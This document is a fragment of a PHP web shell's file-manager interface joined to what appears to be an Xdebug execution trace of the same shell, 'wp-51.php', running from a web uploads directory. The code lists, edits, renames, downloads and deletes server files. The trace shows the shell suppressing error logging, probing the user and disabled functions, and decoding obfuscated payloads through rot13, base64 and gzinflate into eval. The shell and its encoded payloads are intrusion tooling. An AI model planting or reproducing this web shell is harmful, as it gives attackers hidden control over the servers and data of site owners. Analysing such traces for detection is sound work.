echo "\n<tr>\n\t<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href=\"?path={$path}/{$dir}\">{$dir}</a></td>\n\t<td class='text-center'>{$dt}</td>\n\t<td class='text-center'>-</td>\n\t<td class='text-center'>{$downer}<gr>:</gr>{$dgrp}</td>\n\t<td class='text-center'>";
if (is_writable("{$path}/{$dir}")) {
echo "<gr>";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<rd>";
}
echo p("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</gr></rd></td>";
}
echo "\n\t<td class=\"text-center\">\n\t<form method=\"POST\" action=\"?option&path={$path}\">\n\t\t<div class=\"btn-group\">\n\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"ganti_nama\"><i class='bi bi-pencil-fill'></i></button>\n\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"hapus\"><i class='bi bi-trash-fill'></i></button>\n\t\t</div>\n\t\t<input type=\"hidden\" name=\"type\" value=\"dir\">\n\t\t<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\n\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\n\t</form>\n\t</td>\n</tr>";
}
foreach ($scandir as $file) {
$ft = date("Y-m-d H:i:s", filemtime("{$path}/{$file}"));
if (!is_file($path . '/' . $file)) {
continue;
}
if (function_exists('posix_getpwuid')) {
$fowner = @posix_getpwuid(fileowner("{$path}/{$file}"));
$fowner = $fowner['name'];
} else {
$fowner = fileowner("{$path}/{$file}");
}
if (function_exists('posix_getgrgid')) {
$fgrp = @posix_getgrgid(filegroup("{$path}/{$file}"));
$fgrp = $fgrp['name'];
} else {
$fgrp = filegroup("{$path}/{$file}");
}
echo "\n<tr>\n\t<td><i class='bi bi-file-earmark-code-fill'></i><a class='text-decoration-none text-secondary' href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\n\t<td class='text-center'>{$ft}</td>\n\t<td class='text-center'>" . sz(filesize($file)) . "</td>\n\t<td class='text-center'>{$fowner}<gr>:</gr>{$fgrp}</td>\n\t<td class='text-center'>";
if (is_writable("{$path}/{$file}")) {
echo "<gr>";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<rd>";
}
echo p("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</gr></rd></td>";
}
echo "\n\t<td class=\"text-center\">\n\t\t<form method=\"POST\" action=\"?option&path={$path}\">\n\t\t\t<div class=\"btn-group\">\n\t\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"edit\"><i class='bi bi-pencil-square'></i></button>\n\t\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"ganti_nama\"><i class='bi bi-pencil-fill'></i></button>\n\t\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"download\"><i class='bi bi-download'></i></button>\n\t\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"hapus\"><i class='bi bi-trash-fill'></i></button>\n\t\t\t</div>\n\t\t\t<input type=\"hidden\" name=\"type\" value=\"file\">\n\t\t\t<input type=\"hidden\" name=\"name\" value=\"{$file}\">\n\t\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\n\t\t</form>\n\t</td>\n</tr>";
}
}
?>
</tbody>
</table>
<div class='text-secondary'>© <?php
echo " " . date('Y') . " {$_n}";
?></div>
</div>
</body>
</html>Execution traces
data/traces/353497c84ad3aefee7bc32d954fe0ea2_trace-1676242884.5325.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:01:50.430309]
1 0 1 0.000177 393512
1 3 0 0.000859 531136 {main} 1 /var/www/html/uploads/wp-51.php 0 0
2 4 0 0.000878 531136 set_time_limit 0 /var/www/html/uploads/wp-51.php 3 1 0
2 4 1 0.000896 531200
2 4 R FALSE
2 5 0 0.000910 531168 error_reporting 0 /var/www/html/uploads/wp-51.php 4 1 0
2 5 1 0.000924 531208
2 5 R 22527
2 6 0 0.000938 531168 ini_set 0 /var/www/html/uploads/wp-51.php 5 2 'error_log' NULL
2 6 1 0.000954 531240
2 6 R ''
2 7 0 0.000967 531168 ini_set 0 /var/www/html/uploads/wp-51.php 6 2 'log_errors' 0
2 7 1 0.000982 531240
2 7 R '1'
2 8 0 0.000995 531168 ini_set 0 /var/www/html/uploads/wp-51.php 7 2 'max_execution_time' 0
2 8 1 0.001008 531208
2 8 R '0'
2 9 0 0.001021 531136 ini_set 0 /var/www/html/uploads/wp-51.php 8 2 'output_buffering' 0
2 9 1 0.001035 531208
2 9 R FALSE
2 10 0 0.001048 531136 ini_set 0 /var/www/html/uploads/wp-51.php 9 2 'display_errors' 0
2 10 1 0.001062 531208
2 10 R ''
2 11 0 0.001075 531136 date_default_timezone_set 0 /var/www/html/uploads/wp-51.php 10 1 'Asia/Malaysia'
2 11 1 0.001100 531184
2 11 R FALSE
1 A /var/www/html/uploads/wp-51.php 11 $_n = '🆂🅷🅴🅻🅻🆉🅾🅽🅴 ⑤① '
1 A /var/www/html/uploads/wp-51.php 12 $_s = '<style>table{display:none;}</style><div class=\'table-responsive\'><hr></div>'
1 A /var/www/html/uploads/wp-51.php 13 $_r = 'required=\'required\''
1 A /var/www/html/uploads/wp-51.php 14 $_x = '<i class=\'bi bi-menu-up\'></i>'
2 12 0 0.001168 531136 ini_get 0 /var/www/html/uploads/wp-51.php 85 1 'disable_functions'
2 12 1 0.001182 531616
2 12 R 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1 A /var/www/html/uploads/wp-51.php 85 $disfunc = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1 A /var/www/html/uploads/wp-51.php 89 $disfc = '<rd>pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,</rd>'
2 13 0 0.001250 532032 function_exists 0 /var/www/html/uploads/wp-51.php 91 1 'posix_getegid'
2 13 1 0.001264 532072
2 13 R TRUE
2 14 0 0.001277 532032 posix_geteuid 0 /var/www/html/uploads/wp-51.php 97 0
2 14 1 0.001290 532032
2 14 R 33
2 15 0 0.001303 532032 posix_getpwuid 0 /var/www/html/uploads/wp-51.php 97 1 33
2 15 1 0.001334 532864
2 15 R ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
1 A /var/www/html/uploads/wp-51.php 97 $uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
2 16 0 0.001377 532832 posix_getegid 0 /var/www/html/uploads/wp-51.php 98 0
2 16 1 0.001390 532832
2 16 R 33
2 17 0 0.001412 532832 posix_getgrgid 0 /var/www/html/uploads/wp-51.php 98 1 33
2 17 1 0.001440 533496
2 17 R ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
1 A /var/www/html/uploads/wp-51.php 98 $gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
1 A /var/www/html/uploads/wp-51.php 99 $user = 'www-data'
1 A /var/www/html/uploads/wp-51.php 100 $uid = 33
1 A /var/www/html/uploads/wp-51.php 101 $group = 'www-data'
1 A /var/www/html/uploads/wp-51.php 102 $gid = 33
2 18 0 0.001516 532112 strtolower 0 /var/www/html/uploads/wp-51.php 104 1 'safe_mode'
2 18 1 0.001530 532144
2 18 R 'safe_mode'
2 19 0 0.001543 532112 ini_get 0 /var/www/html/uploads/wp-51.php 104 1 'safe_mode'
2 19 1 0.001575 532144
2 19 R FALSE
1 A /var/www/html/uploads/wp-51.php 104 $sm = '<gr>OFF</gr>'
1 A /var/www/html/uploads/wp-51.php 105 $i1i = '========================================================================\n\tObfuscation provided by Unknowndevice64 - Free Online PHP Obfuscator\n\t\t\t\thttp://www.ud64.com/\n=============================================================================='
2 20 0 0.001631 532112 getcwd 0 /var/www/html/uploads/wp-51.php 131 0
2 20 1 0.001645 532160
2 20 R '/var/www/html/uploads'
1 A /var/www/html/uploads/wp-51.php 131 $path = '/var/www/html/uploads'
2 21 0 0.001671 532160 str_replace 0 /var/www/html/uploads/wp-51.php 133 3 '\\' '/' '/var/www/html/uploads'
2 21 1 0.001687 532256
2 21 R '/var/www/html/uploads'
1 A /var/www/html/uploads/wp-51.php 133 $path = '/var/www/html/uploads'
2 22 0 0.001711 532160 explode 0 /var/www/html/uploads/wp-51.php 134 2 '/' '/var/www/html/uploads'
2 22 1 0.001726 532736
2 22 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/wp-51.php 134 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/wp-51.php 135 $id = 0
1 A /var/www/html/uploads/wp-51.php 137 $a = TRUE
1 A /var/www/html/uploads/wp-51.php 135 $id = 1
1 A /var/www/html/uploads/wp-51.php 143 $i = 0
1 A /var/www/html/uploads/wp-51.php 143 $i++
1 A /var/www/html/uploads/wp-51.php 143 $i++
1 A /var/www/html/uploads/wp-51.php 135 $id = 2
1 A /var/www/html/uploads/wp-51.php 143 $i = 0
1 A /var/www/html/uploads/wp-51.php 143 $i++
1 A /var/www/html/uploads/wp-51.php 143 $i++
1 A /var/www/html/uploads/wp-51.php 143 $i++
1 A /var/www/html/uploads/wp-51.php 135 $id = 3
1 A /var/www/html/uploads/wp-51.php 143 $i = 0
1 A /var/www/html/uploads/wp-51.php 143 $i++
1 A /var/www/html/uploads/wp-51.php 143 $i++
1 A /var/www/html/uploads/wp-51.php 143 $i++
1 A /var/www/html/uploads/wp-51.php 143 $i++
1 A /var/www/html/uploads/wp-51.php 135 $id = 4
1 A /var/www/html/uploads/wp-51.php 143 $i = 0
1 A /var/www/html/uploads/wp-51.php 143 $i++
1 A /var/www/html/uploads/wp-51.php 143 $i++
1 A /var/www/html/uploads/wp-51.php 143 $i++
1 A /var/www/html/uploads/wp-51.php 143 $i++
1 A /var/www/html/uploads/wp-51.php 143 $i++
2 23 0 0.001964 532664 p 1 /var/www/html/uploads/wp-51.php 149 1 '/var/www/html/uploads'
3 24 0 0.001976 532664 fileperms 0 /var/www/html/uploads/wp-51.php 63 1 '/var/www/html/uploads'
3 24 1 0.001993 532728
3 24 R 16895
2 A /var/www/html/uploads/wp-51.php 63 $p = 16895
2 A /var/www/html/uploads/wp-51.php 64 $i = 'u'
2 A /var/www/html/uploads/wp-51.php 69 $i = 'd'
2 A /var/www/html/uploads/wp-51.php 72 $i .= 'r'
2 A /var/www/html/uploads/wp-51.php 73 $i .= 'w'
2 A /var/www/html/uploads/wp-51.php 74 $i .= 'x'
2 A /var/www/html/uploads/wp-51.php 75 $i .= 'r'
2 A /var/www/html/uploads/wp-51.php 76 $i .= 'w'
2 A /var/www/html/uploads/wp-51.php 77 $i .= 'x'
2 A /var/www/html/uploads/wp-51.php 78 $i .= 'r'
2 A /var/www/html/uploads/wp-51.php 79 $i .= 'w'
2 A /var/www/html/uploads/wp-51.php 80 $i .= 'x'
2 23 1 0.002120 532728
2 23 R 'drwxrwxrwx'
2 25 0 0.002134 532728 тЦЯ 1 /var/www/html/uploads/wp-51.php 149 2 '/var/www/html/uploads' 'drwxrwxrwx'
3 26 0 0.002148 532728 getcwd 0 /var/www/html/uploads/wp-51.php 25 0
3 26 1 0.002160 532776
3 26 R '/var/www/html/uploads'
2 A /var/www/html/uploads/wp-51.php 25 $тЦЪ = '/var/www/html/uploads'
3 27 0 0.002185 532776 is_writable 0 /var/www/html/uploads/wp-51.php 27 1 '/var/www/html/uploads'
3 27 1 0.002202 532816
3 27 R TRUE
2 25 1 0.002216 532784
2 25 R '<gr class=\'anu\'>drwxrwxrwx</gr>'
2 28 0 0.002232 532688 php_uname 0 /var/www/html/uploads/wp-51.php 161 0
2 28 1 0.002246 532800
2 28 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 29 0 0.002266 533584 gethostbyname 0 /var/www/html/uploads/wp-51.php 164 1 'localhost'
2 29 1 0.002300 533664
2 29 R '127.0.0.1'
2 30 0 0.002316 533584 ip 1 /var/www/html/uploads/wp-51.php 165 0
2 A /var/www/html/uploads/wp-51.php 45 $ipas = ''
3 31 0 0.002337 533584 getenv 0 /var/www/html/uploads/wp-51.php 46 1 'HTTP_CLIENT_IP'
3 31 1 0.002352 533616
3 31 R FALSE
3 32 0 0.002370 533584 getenv 0 /var/www/html/uploads/wp-51.php 48 1 'HTTP_X_FORWARDED_FOR'
3 32 1 0.002384 533616
3 32 R FALSE
3 33 0 0.002397 533584 getenv 0 /var/www/html/uploads/wp-51.php 50 1 'HTTP_X_FORWARDED'
3 33 1 0.002410 533616
3 33 R FALSE
3 34 0 0.002423 533584 getenv 0 /var/www/html/uploads/wp-51.php 52 1 'HTTP_FORWARDED_FOR'
3 34 1 0.002436 533616
3 34 R FALSE
3 35 0 0.002449 533584 getenv 0 /var/www/html/uploads/wp-51.php 54 1 'HTTP_FORWARDED'
3 35 1 0.002461 533616
3 35 R FALSE
3 36 0 0.002474 533584 getenv 0 /var/www/html/uploads/wp-51.php 56 1 'REMOTE_ADDR'
3 36 1 0.002487 533656
3 36 R '127.0.0.1'
3 37 0 0.002501 533584 getenv 0 /var/www/html/uploads/wp-51.php 57 1 'REMOTE_ADDR'
3 37 1 0.002513 533656
3 37 R '127.0.0.1'
2 A /var/www/html/uploads/wp-51.php 57 $ipas = '127.0.0.1'
2 30 1 0.002537 533624
2 30 R '127.0.0.1'
1 A /var/www/html/uploads/wp-51.php 180 $uD64_c0m = 'str_rot13'
1 A /var/www/html/uploads/wp-51.php 180 $uD64_Com = 'gzinflate'
1 A /var/www/html/uploads/wp-51.php 180 $uD64_C0m = 'base64_decode'
2 38 0 0.002586 532688 str_rot13 0 /var/www/html/uploads/wp-51.php 180 1 'SMAYLdf4RRHKyRSRNzxm6NRsxLpRNi0X5SzZLjkFLuYGgzU1mqgN1G3aIvaqrnITo61+pWXRu3b8gvEwsn1392XZSE3PbgE8dxo8U3Rvyn78ewYmRAd3IHordGMQNn5HRSqPutehRkBeR2mkWPEB6kG9Pu181TCj2LmMDnUVvbK/lYH7ImXVjNiwOiL9toZJluTXw+8Z80R5Bko2zOnWZ4a1+aVVOKBCvX1EXYWloKK3zefjXgWhk9Y+aN9mliU9J6qmkACe2yuERbOposyX5GvQmUPIMKF5hTYjdDVq1UuhPso9naEDYk5ETR4ZmoSH3J9g0nmkaSBV98INAVplbWMRqBzDyUvyhciNrK8x8QAUNxf+ZpOajdFw9rP/tAhm0afVzq3CJx06U/VU8pXQmzWrM/CEcBwpYCn2dHBt+kiNxrzS9HWriJYYH2Jf3evADWRCb/txSt0j6YSJKxEp/0MxTqE2mveCsYAxXhwb3kHFHMKhPEgLly6vaIQVSvz/'
2 38 1 0.002612 534256
2 38 R 'FZNLYqs4EEUXlEFEAmkz6AEfkYcEAv0K5FmMYwxSYhLTtmH1zdtA1T3nVindeaVGb61+cJKEh3o8tiRjfa1392KMFR3CotR8qkb8H3Eila78rjLzENq3VUbeqTZDAa5UEFdChgruExOrE2zxJCRO6xT9Ch181GPw2YzZQaHIioX/yLU7VzKIwAvjBvY9gbMWyhGKj+8M80E5Oxb2mBaJM4n1+nIIBXOPiK1RKLJybXX3mrswKtJux9L+nA9zyvH9W6dzxNPr2lhREoBcbflK5TiDzHCVZXS5uGLwqQId1HhuCfb9anRQLx5RGE4MzbFU3W9t0azxnFOI98VANIcyoJZEdOmQlHilupvAeX8k8DNHAks+McBnwqSj9eC/gNuz0nsImd3PWk06H/IH8cKDzmJeZ/PRpOjcLPa2qUOg+xvAkemF9UJevWLLU2Ws3riNQJEPo/gkFg0w6LFWXkRc/0ZkGdR2zirPfLNkKujo3xUSUZXuCRtYyl6inVDIFim/'
2 39 0 0.002639 534224 base64_decode 0 /var/www/html/uploads/wp-51.php 180 1 'FZNLYqs4EEUXlEFEAmkz6AEfkYcEAv0K5FmMYwxSYhLTtmH1zdtA1T3nVindeaVGb61+cJKEh3o8tiRjfa1392KMFR3CotR8qkb8H3Eila78rjLzENq3VUbeqTZDAa5UEFdChgruExOrE2zxJCRO6xT9Ch181GPw2YzZQaHIioX/yLU7VzKIwAvjBvY9gbMWyhGKj+8M80E5Oxb2mBaJM4n1+nIIBXOPiK1RKLJybXX3mrswKtJux9L+nA9zyvH9W6dzxNPr2lhREoBcbflK5TiDzHCVZXS5uGLwqQId1HhuCfb9anRQLx5RGE4MzbFU3W9t0azxnFOI98VANIcyoJZEdOmQlHilupvAeX8k8DNHAks+McBnwqSj9eC/gNuz0nsImd3PWk06H/IH8cKDzmJeZ/PRpOjcLPa2qUOg+xvAkemF9UJevWLLU2Ws3riNQJEPo/gkFg0w6LFWXkRc/0ZkGdR2zirPfLNkKujo3xUSUZXuCRtYyl6inVDIFim/'
2 39 1 0.002665 535792
2 39 R '\025�Kb�8\020E\027�AD\002i3�\001\037��\004\002�\n�Y�c\fRb\022Ӷa���@�=�V)�y�Fo�~p���z<�$c}�w�b�\025\035¢�|�F�\037q"����2�\020ڷUFީ6C\001�T\020WB�\n�\023\023�\023l�$$N�\024�\n\035|�c�ٌ�A�Ȋ��ȵ;W2��\v�\006�=��\026�\021���\f�A9;\026��\026�3���r\b\005s���Q(�rmu���0*�n���\017s��[�s����XQ\022�\\m�J�8��p�et��b�\002\035�xn\t��jtP/\036Q\030N\fͱT�omѬ�S���@4�2��Dt鐔x����y$�3G\002K>1�g¤��࿀۳�{\b���ZM:\037�\a��b^g�Ѥ��,���C��\033���B^�b�Se��@�\017��$\026\r0�V^D\\�Fd\031�v�*�|�d*���\025\022Q��\t\033'
2 40 0 0.002728 534224 gzinflate 0 /var/www/html/uploads/wp-51.php 180 1 '\025�Kb�8\020E\027�AD\002i3�\001\037��\004\002�\n�Y�c\fRb\022Ӷa���@�=�V)�y�Fo�~p���z<�$c}�w�b�\025\035¢�|�F�\037q"����2�\020ڷUFީ6C\001�T\020WB�\n�\023\023�\023l�$$N�\024�\n\035|�c�ٌ�A�Ȋ��ȵ;W2��\v�\006�=��\026�\021���\f�A9;\026��\026�3���r\b\005s���Q(�rmu���0*�n���\017s��[�s����XQ\022�\\m�J�8��p�et��b�\002\035�xn\t��jtP/\036Q\030N\fͱT�omѬ�S���@4�2��Dt鐔x����y$�3G\002K>1�g¤��࿀۳�{\b���ZM:\037�\a��b^g�Ѥ��,���C��\033���B^�b�Se��@�\017��$\026\r0�V^D\\�Fd\031�v�*�|�d*���\025\022Q��\t\033'
2 40 1 0.002797 535792
2 40 R 'TUc1MU06XUxQJC9bPjdXJFNgPU8wLjBTKi9LMUQpOjEuJlRDSlMnOFYxRU4kOFJGKUYiLVlMTVBORS9TVwpNRzlRNy1SVClUUD0rRU5aPj5eWjFbT0AkRyQqSzchOS5AV19BWVZgJVhURTlJKEdGNEQiTlkjLkdDLClYCk1gMi9RNlxANzA9RFMzXUc3Il9ALDc8NDghIitDQEwnUDtAQDszWkRMJVVITUYiMTlQNVFYQTFFKyolLi4KTVU5PEtXJE44OjlVPy1JTEVfN0tBSTcrPk0tUEtIKVBZLiJUQVM5KkJAKyc0SSEzKUcpVl1HSVQhQ0RESQpNVEhJNSlKPi42VlZNM1xRSFwhUTpUIiIxJ19bUFBQPFtdYD0hWykvVlM0VUgvVVdNUyNgRSs1LjlVOFNPCk1YR0A4VjReJk0iViUjPT1AJlg6JSM5PktFO1YnNCpLKj4wT0RAODZJNiNDN2A8RT0kLDQoWk01OD8xX1kKTTQ0USY4Ol8mOkc1'
1 A /var/www/html/uploads/wp-51.php 180 $x0zRy = 'TUc1MU06XUxQJC9bPjdXJFNgPU8wLjBTKi9LMUQpOjEuJlRDSlMnOFYxRU4kOFJGKUYiLVlMTVBORS9TVwpNRzlRNy1SVClUUD0rRU5aPj5eWjFbT0AkRyQqSzchOS5AV19BWVZgJVhURTlJKEdGNEQiTlkjLkdDLClYCk1gMi9RNlxANzA9RFMzXUc3Il9ALDc8NDghIitDQEwnUDtAQDszWkRMJVVITUYiMTlQNVFYQTFFKyolLi4KTVU5PEtXJE44OjlVPy1JTEVfN0tBSTcrPk0tUEtIKVBZLiJUQVM5KkJAKyc0SSEzKUcpVl1HSVQhQ0RESQpNVEhJNSlKPi42VlZNM1xRSFwhUTpUIiIxJ19bUFBQPFtdYD0hWykvVlM0VUgvVVdNUyNgRSs1LjlVOFNPCk1YR0A4VjReJk0iViUjPT1AJlg6JSM5PktFO1YnNCpLKj4wT0RAODZJNiNDN2A8RT0kLDQoWk01OD8xX1kKTTQ0USY4Ol8mOkc1'
2 41 0 0.002853 534224 getcwd 0 /var/www/html/uploads/wp-51.php 186 0
2 41 1 0.002866 534272
2 41 R '/var/www/html/uploads'
1 A /var/www/html/uploads/wp-51.php 186 $dir = '/var/www/html/uploads'
2 42 0 0.002892 534272 str_replace 0 /var/www/html/uploads/wp-51.php 188 3 '\\' '/' '/var/www/html/uploads'
2 42 1 0.002907 534368
2 42 R '/var/www/html/uploads'
1 A /var/www/html/uploads/wp-51.php 188 $dir = '/var/www/html/uploads'
2 43 0 0.002932 534272 explode 0 /var/www/html/uploads/wp-51.php 189 2 '/' '/var/www/html/uploads'
2 43 1 0.002946 534848
2 43 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/wp-51.php 189 $scdir = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/wp-51.php 190 $i = 0
1 A /var/www/html/uploads/wp-51.php 190 $i++
2 44 0 0.003003 534776 str_rot13 0 /var/www/html/uploads/wp-51.php 436 1 '$k0xEm="MIKoogf4RC2IbhuQv7kDwh0xXNdfYMTcYdESpbnBQY8Hmd5fHdaGyIgqia7Uqv8C+2NL5CNZm5xmUY0oJYGcC70ST75dfJPT8n4L09plzsdIFT/GjJPEBYBBVlvth0aUiIBQaQd/b7v+mqwFesNFGlE0eElKSU9rhCcISpWcgTjfemtxKUNkT3YEiuWBX/68yCM+lX/kc0g86NHXscVQ3cpUBGBj85aDW+ARSDq2Ztq2KlFlD9tE390cp0gGJZa0LJnyd9iZAcKvPeJ/4ScUhNXeJEy3bkYIJp+6jNfie6QYNnn+iBcpS/nft01JSk37dj6dQ7e6cRq+hqqq7d0bY90Y8hSnW32gR6GUqsrdpiiZZGTseMH/5PRjMqKPWr6mpsYx6A7ltR3hwpippMVkoNchAzfVGD58oud+y2TwcB0nnoSGQo6F7eavbISB7yCYNz0mj3TDfBgKxRoFuwgQqInjnjes+gGgEuK6QrRsZduhQpv5jsOQ2L2P'
2 44 1 0.003029 536600
2 44 R '$x0kRz="ZVXbbts4EP2VouhDi7xQju0kKAqsLZGpLqRFcoaODL8Uzq5sUqnTlVtdvn7Hdi8P+2AY5PAMz5kzHL0bWLTpP70FG75qsWCG8a4Y09cymfqVSG/TwWCROLOOIyigu0nHvVODnDq/o7i+zdjSrfASTyR0rRyXFH9euPpVFcJptGwsrzgkXHAxG3LRvhJOK/68lPZ+yK/xp0t86AUKfpID3pcHOTOw85nQJ+NEFQd2Mgd2XySyQ9gR390pc0tTWMn0YWalq9vMNpXiCrW/4FpHuAKrWRl3oxLVWc+6wAsvr6DLAaa+vOpcF/asg01WFx37qw6qD7r6pEd+uddd7q0oL90L8uFaJ32tE6THdfeqcvvMMTGfrZU/5CEwZdXCJe6zcfLk6N7ygE3ujcvccZIxbApuNmsITQ58bhq+l2GjpO0aabFTDb6S7rnioVFO7lPLAm0zw3GQsOtXkEbShjtDdVawawrf+tTtRhX6DeEfMqhuDci5wfBD2Y2C'
2 45 0 0.003077 545160 eval 1 '$x0kRz="ZVXbbts4EP2VouhDi7xQju0kKAqsLZGpLqRFcoaODL8Uzq5sUqnTlVtdvn7Hdi8P+2AY5PAMz5kzHL0bWLTpP70FG75qsWCG8a4Y09cymfqVSG/TwWCROLOOIyigu0nHvVODnDq/o7i+zdjSrfASTyR0rRyXFH9euPpVFcJptGwsrzgkXHAxG3LRvhJOK/68lPZ+yK/xp0t86AUKfpID3pcHOTOw85nQJ+NEFQd2Mgd2XySyQ9gR390pc0tTWMn0YWalq9vMNpXiCrW/4FpHuAKrWRl3oxLVWc+6wAsvr6DLAaa+vOpcF/asg01WFx37qw6qD7r6pEd+uddd7q0oL90L8uFaJ32tE6THdfeqcvvMMTGfrZU/5CEwZdXCJe6zcfLk6N7ygE3ujcvccZIxbApuNmsITQ58bhq+l2GjpO0aabFTDb6S7rnioVFO7lPLAm0zw3GQsOtXkEbShjtDdVawawrf+tTtRhX6DeEfMqhuDci5wfBD2Y2CJI1KtyPdXVhDOncivCh8zpRfcqRzGRJfMG6dOFfg7sEJ7qWXe+X5pHSLSE+WTjKzI33cEV8VIi2DjizpLmN8sEPnc8A2A7eRDUZ26NFZbBXH76tQ9cbrF4Bj5CD6ooKeSXDCCIxId1/G+nTGl7DoMzBPpJupwPq8wX5NfJWdMjfwUR00+dAISX2iIHyToGrns0fE9t4IzmQwSsKMG1ePJo6qFeJ+fZi+GKhzsN2kEJqpJMypPpHyjnTXd9nIjwrIN9CM6jBQ3c/cuB2zRxD1QFoj0i1kwr2yMnKNQDmaDSxI9wFf8xGDw3bMmKlKwNnan57Iw7lk6BXXUQ4nQX53pHVYeYPrREYrIP9tmKwGt1S2izLHBwXNWfe9stgoxIccpox8j/QgCsJldsTbAkKHI+4VVA+YUGUxzHDkU4n6VY36xUK4MbbXhTeiGN3jEwbyG4MUYZaRn4WvZsWZA9B9zbJaMfIJ5MTa7oZcTeVI/BMdEFmnAv9XCRkVXj0C8HsDLBTxRil631Ko5RrOfdK2SoSoPJjn3LdNRjgXel16o6jOL9TXzAXeyoZ8SnpHc2aiWPheBoxIxwTdYnSCNaR7Igd2SziOo3Glpf4ivqXYLGVCbwZoPoHRRUz8YL+2UEXUr0dFrYaUN7fVQxaztvRq6Ub5ld7JWXeTgm4VYFeG3Skf0wmi7qi2X2Vi1AoWkyfBjpp132RcRc7XE+T17/mkbE0dsvgzr6jE+SHt13HX5K5mOiw5zam99NOmuuDM+VyWDsfBcOpNFtUr2M00tAfN9U068IF0Mx3fD9XPNekmv0xKc2NxmRuQfks9za0YX9de/8QJWwZVW3vJ+93FQpRYNRAfDz/n3heFWf1k6/M6Lw9nfseJ/M1vJuwfXdnqF46FofQZv+QVbV4tjp/efnzn2bAJn95uo+nttp//s41m821/N6f1jP4n22g+3fYz2p+f1/Sj9SU2v6Wzd7/WlOnwOxOhphGdPmecbefz7a8c0+ll53/Yv/7+8aV58/7Nlc37a6r37y5frA8fPnz8Dw==";@eval(gzinflate(base64_decode($x0kRz)));' /var/www/html/uploads/wp-51.php 436 0
2 A /var/www/html/uploads/wp-51.php(436) : eval()'d code 1 $x0kRz = 'ZVXbbts4EP2VouhDi7xQju0kKAqsLZGpLqRFcoaODL8Uzq5sUqnTlVtdvn7Hdi8P+2AY5PAMz5kzHL0bWLTpP70FG75qsWCG8a4Y09cymfqVSG/TwWCROLOOIyigu0nHvVODnDq/o7i+zdjSrfASTyR0rRyXFH9euPpVFcJptGwsrzgkXHAxG3LRvhJOK/68lPZ+yK/xp0t86AUKfpID3pcHOTOw85nQJ+NEFQd2Mgd2XySyQ9gR390pc0tTWMn0YWalq9vMNpXiCrW/4FpHuAKrWRl3oxLVWc+6wAsvr6DLAaa+vOpcF/asg01WFx37qw6qD7r6pEd+uddd7q0oL90L8uFaJ32tE6THdfeqcvvMMTGfrZU/5CEwZdXCJe6zcfLk6N7ygE3ujcvccZIxbApuNmsITQ58bhq+l2GjpO0aabFTDb6S7rnioVFO7lPLAm0zw3GQsOtXkEbShjtDdVawawrf+tTtRhX6DeEfMqhuDci5wfBD2Y2CJI1KtyPd'
